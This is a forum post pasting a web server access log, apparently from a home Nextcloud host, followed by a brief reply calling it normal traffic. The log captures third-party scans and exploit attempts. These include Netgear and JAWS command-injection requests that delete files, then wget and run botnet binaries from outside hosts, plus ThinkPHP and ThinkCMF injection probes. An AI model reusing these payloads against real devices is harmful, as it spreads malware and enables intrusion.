[08/Feb/2020:22:51:38 +0100] "GET /phpmyadmin2014/index.php?lang=en HTTP/1.1" 302 238 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:39 +0100] "GET /phpmyadmin2015/index.php?lang=en HTTP/1.1" 302 238 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:40 +0100] "GET /phpmyadmin2016/index.php?lang=en HTTP/1.1" 302 238 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:40 +0100] "GET /phpmyadmin2017/index.php?lang=en HTTP/1.1" 302 238 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:41 +0100] "GET /phpmyadmin2018/index.php?lang=en HTTP/1.1" 302 238 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:42 +0100] "GET /phpmyadmin2019/index.php?lang=en HTTP/1.1" 302 238 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:42 +0100] "GET /phpmyadmin2020/index.php?lang=en HTTP/1.1" 302 238 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:43 +0100] "GET /index.php?lang=en HTTP/1.1" 302 223 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 5.88.116.236 - - [08/Feb/2020:23:06:26 +0100] "GET / HTTP/1.0" 302 206 "-" "-" 189.84.246.221 - - [08/Feb/2020:23:24:57 +0100] "GET / HTTP/1.1" 400 226 "-" "-" 188.217.244.41 - - [08/Feb/2020:23:45:10 +0100] "GET / HTTP/1.1" 400 226 "-" "-" 188.167.163.70 - - [09/Feb/2020:00:24:26 +0100] "GET / HTTP/1.1" 302 206 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 222.186.19.221 - - [09/Feb/2020:01:28:53 +0100] "CONNECT ip.ws.126.net:443 HTTP/1.1" 302 206 "-" "Go-http-client/1.1" 165.16.37.162 - - [09/Feb/2020:01:37:41 +0100] "GET / HTTP/1.1" 302 206 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 46.214.17.56 - - [09/Feb/2020:02:13:18 +0100] "GET / HTTP/1.0" 302 206 "-" "-" 98.155.3.83 - - [09/Feb/2020:03:19:54 +0100] "GET / HTTP/1.1" 400 226 "-" "-" 18.191.237.203 - - [09/Feb/2020:03:33:27 +0100] "GET / HTTP/1.1" 302 206 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" 198.211.10.10 - - [09/Feb/2020:03:41:25 +0100] "GET / HTTP/1.0" 301 230 "-" "-" 175.106.14.142 - - [09/Feb/2020:04:16:14 +0100] "GET / HTTP/1.1" 302 206 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 102.23.146.165 - - [09/Feb/2020:04:41:59 +0100] "GET / HTTP/1.1" 302 206 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 139.162.144.244 - - [09/Feb/2020:05:37:12 +0100] "GET / HTTP/1.0" 301 230 "-" "-" 97.107.141.168 - - [09/Feb/2020:05:37:16 +0100] "GET / HTTP/1.0" 301 230 "-" "-" 97.107.141.168 - - [09/Feb/2020:05:37:16 +0100] "Gh0st\xad" 400 226 "-" "-" 97.107.141.168 - - [09/Feb/2020:05:37:19 +0100] "HELP" 400 226 "-" "-" 97.107.141.168 - - [09/Feb/2020:05:37:20 +0100] "\x1b\x84\xd5\xb0]\xf4\xc4\x93\xc50\xc2X\x8c\xda\xb1\xd7\xac\xafn\x1d\xe1\x1e\x1a3*\x85\xb7\x1d'\xb1\xc9k\xbf\xf0\xbc\n" 400 226 "-" "-" 97.107.141.168 - - [09/Feb/2020:05:37:21 +0100] "\x16\x03\x01" 400 226 "-" "-" 97.107.141.168 - - [09/Feb/2020:05:37:23 +0100] "\xbd\xff\x9e\xffE\xff\x9e\xff\xbd\xff\x9e\xff\xa4\xff\x86\xff\xc4\xff\xbe\xff\xc7\xff\xdb\xff\xee\xffx\\d9\xff\xed\xff\xa4\xff\x9d\xff\xcf\xff\xd8\xff\xe5\xff\x04\xff\x12\xff0\xff\xb1\xff\xbd\xff\xe7\xff\xe2\xff\xdd\xff\xdc\xff\xde\xff\xc8\xff\xcc\xff\xbe\xff\xf8\xff&\xff\x01\xff\x0f\xff\xf5\xff\x06\xff\xff\xff\xf7\xff!\xff\xde\xff\x02\xff&\xff\x0c\xff\x01\xff\xf5\xff\n" 400 226 "-" "-" 96.126.126.80 - - [09/Feb/2020:06:07:06 +0100] "GET / HTTP/1.1" 301 230 "-" "Go-http-client/1.1" 96.126.126.80 - - [09/Feb/2020:06:07:06 +0100] "GET / HTTP/1.1" 301 230 "-" "Go-http-client/1.1" 2.187.80.96 - - [09/Feb/2020:08:00:23 +0100] "GET / HTTP/1.1" 302 206 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 69.142.175.15 - - [09/Feb/2020:08:20:12 +0100] "GET / HTTP/1.1" 400 226 "-" "-" 63.143.35.230 - - [09/Feb/2020:09:02:15 +0100] "HEAD /robots.txt HTTP/1.0" 301 - "-" "-" 109.111.140.111 - - [09/Feb/2020:11:16:45 +0100] "GET / HTTP/1.1" 302 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 103.79.78.40 - - [09/Feb/2020:12:53:29 +0100] "GET / HTTP/1.1" 302 206 "-" "Mozilla/5.0 zgrab/0.x" 66.151.211.218 - - [09/Feb/2020:13:18:02 +0100] "HEAD /robots.txt HTTP/1.0" 301 - "-" "-" 35.226.136.36 - - [09/Feb/2020:13:29:01 +0100] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 302 247 "-" "ZmEu" 35.226.136.36 - - [09/Feb/2020:13:29:01 +0100] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 302 234 "-" "ZmEu" 35.226.136.36 - - [09/Feb/2020:13:29:01 +0100] "GET /mysqladmin/scripts/setup.php HTTP/1.1" 302 234 "-" "ZmEu" 185.156.177.234 - - [09/Feb/2020:13:45:28 +0100] "\x03" 400 226 "-" "-" 77.223.84.218 - - [09/Feb/2020:14:02:13 +0100] "GET / HTTP/1.1" 302 206 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 153.0.239.194 - - [09/Feb/2020:14:36:58 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 301 401 "-" "-" 162.243.128.147 - - [09/Feb/2020:15:26:39 +0100] "GET / HTTP/1.1" 302 206 "-" "Mozilla/5.0 zgrab/0.x" 45.148.10.179 - - [09/Feb/2020:15:47:14 +0100] "GET / HTTP/1.0" 301 230 "-" "-" 63.143.35.230 - - [09/Feb/2020:16:59:39 +0100] "HEAD /robots.txt HTTP/1.0" 301 - "-" "-" 118.68.4.150 - - [09/Feb/2020:17:07:46 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://scan.casualaffinity.net/jaws;sh+/tmp/jaws HTTP/1.1" 302 282 "-" "Hello, world" 36.82.101.91 - - [09/Feb/2020:20:11:52 +0100] "GET / HTTP/1.1" 400 226 "-" "-" 36.82.101.91 - - [09/Feb/2020:20:12:00 +0100] "GET / HTTP/1.1" 400 226 "-" "-" 36.82.101.91 - - [09/Feb/2020:20:12:25 +0100] "GET / HTTP/1.1" 400 226 "-" "-" 139.162.119.197 - - [09/Feb/2020:20:15:19 +0100] "GET / HTTP/1.1" 302 206 "-" "HTTP Banner Detection (https://security.ipip.net)" 125.165.24.125 - - [09/Feb/2020:20:26:40 +0100] "GET / HTTP/1.1" 302 206 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 81.170.66.113 - - [09/Feb/2020:20:52:52 +0100] "GET / HTTP/1.1" 302 206 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 81.170.66.113 - - [09/Feb/2020:20:52:52 +0100] "GET / HTTP/1.1" 302 206 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 195.205.161.5 - - [09/Feb/2020:21:07:50 +0100] "GET / HTTP/1.1" 302 206 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 222.186.19.221 - - [09/Feb/2020:22:02:28 +0100] "CONNECT ip.ws.126.net:443 HTTP/1.1" 302 206 "-" "Go-http-client/1.1" 5.101.0.209 - - [09/Feb/2020:22:50:18 +0100] "GET /solr/admin/info/system?wt=json HTTP/1.1" 302 236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 5.101.0.209 - - [09/Feb/2020:22:55:08 +0100] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 302 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 5.101.0.209 - - [09/Feb/2020:22:55:09 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 302 236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 5.101.0.209 - - [09/Feb/2020:22:59:12 +0100] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 302 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 178.73.215.171 - - [09/Feb/2020:23:12:01 +0100] "GET / HTTP/1.0" 301 230 "-" "-" 82.127.97.190 - - [10/Feb/2020:00:10:31 +0100] "GET / HTTP/1.1" 302 206 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 76.9.47.192 - - [10/Feb/2020:00:12:04 +0100] "GET / HTTP/1.1" 400 226 "-" "-" 83.222.171.108 - - [10/Feb/2020:01:04:31 +0100] "GET / HTTP/1.1" 400 226 "-" "-" 5.8.10.202 - - [10/Feb/2020:01:22:27 +0100] "GET / HTTP/1.1" 302 206 "-" "fasthttp" 212.237.33.52 - - [10/Feb/2020:01:26:38 +0100] "GET /CFIDE/administrator/ HTTP/1.1" 302 226 "-" "-" 93.70.122.162 - - [10/Feb/2020:16:08:17 +0100] "GET / HTTP/1.1" 400 226 "-" "-" 79.43.136.194 - - [10/Feb/2020:16:15:03 +0100] "GET / HTTP/1.0" 302 206 "-" "-" 23.120.255.180 - - [10/Feb/2020:16:22:27 +0100] "GET / HTTP/1.1" 400 226 "-" "-" 83.223.11.44 - - [10/Feb/2020:16:31:57 +0100] "GET / HTTP/1.0" 302 206 "-" "-" 10.0.0.15 - - [10/Feb/2020:16:34:36 +0100] "GET /nextcloud/ HTTP/1.1" 302 216 "-" "M
-
@Woti looks like normal access.
Is there a reason you dont expect those? There should be millions of entries if you are accessing the system.